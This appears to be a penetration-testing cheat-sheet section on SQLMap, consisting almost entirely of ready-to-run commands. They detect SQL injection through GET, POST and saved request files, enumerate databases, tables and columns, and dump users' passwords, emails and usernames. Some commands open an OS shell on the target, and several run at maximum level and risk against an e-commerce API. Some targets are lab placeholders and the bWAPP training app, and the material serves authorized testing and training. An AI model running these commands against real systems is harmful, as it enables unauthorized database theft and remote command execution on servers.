4.3.6 SQLMap

SQLMap

sqlmap -r <REQUEST_FILE> -p <POST_PARAMETER>
sqlmap -r Post.req

sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title

sqlmap -u "http://10.10.10.10/file.php?id=1" -p id          #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin"      #POST Method

Get database if injection Exists

sqlmap -r login.req --dbs
sqlmap -u "http://10.10.10.10/file.php?id=1" --dbs    #determine the databases:
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs    #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs #POST Method

# List databases
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump

Get Tables in a Database

sqlmap -r login.req -D dbname --tables    #determine the tables:
sqlmap -u "http://10.10.10.10/file.php?id=1" -D dbname --common-tables    #if tables not available, guess tables using common names
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables        #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables #POST Method

Get data in a Database tables

sqlmap -r login.req -D dbname -T table_name --dump
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump      #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump   #POST Method

Get OS-Shell

sqlmap -u "http://10.10.10.10/file.php?id=1" --os-shell

Example of usage

Dumping emails from a table

sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C email --dump

Common parameters

• -u: The vulnerable URL.

• -p: The parameter you suspect is injectable.

• --dbms=mysql: You know the backend DBMS is MySQL.

• --level=5 --risk=3: Enables deeper and riskier tests.

• --technique=EUBT: Restricts the type of SQLi techniques used (Error, Union, Boolean, Time-based).

• -D ecommerce: Targeting the ecommerce database.

• -T users: Looking into the users table.

• -C email: Only extracting the email column.

• --dump: Actually retrieves the data.

Listing columns of a table

sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns

Dumping usernames

sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C username --dump

Listing columns of the users table again (can be used for planning further dumps)

sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns

Enumerating tables with specific prefix/suffix

sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT --current-db --prefix="ecom_" --suffix="_log" --tables

💉SQLMap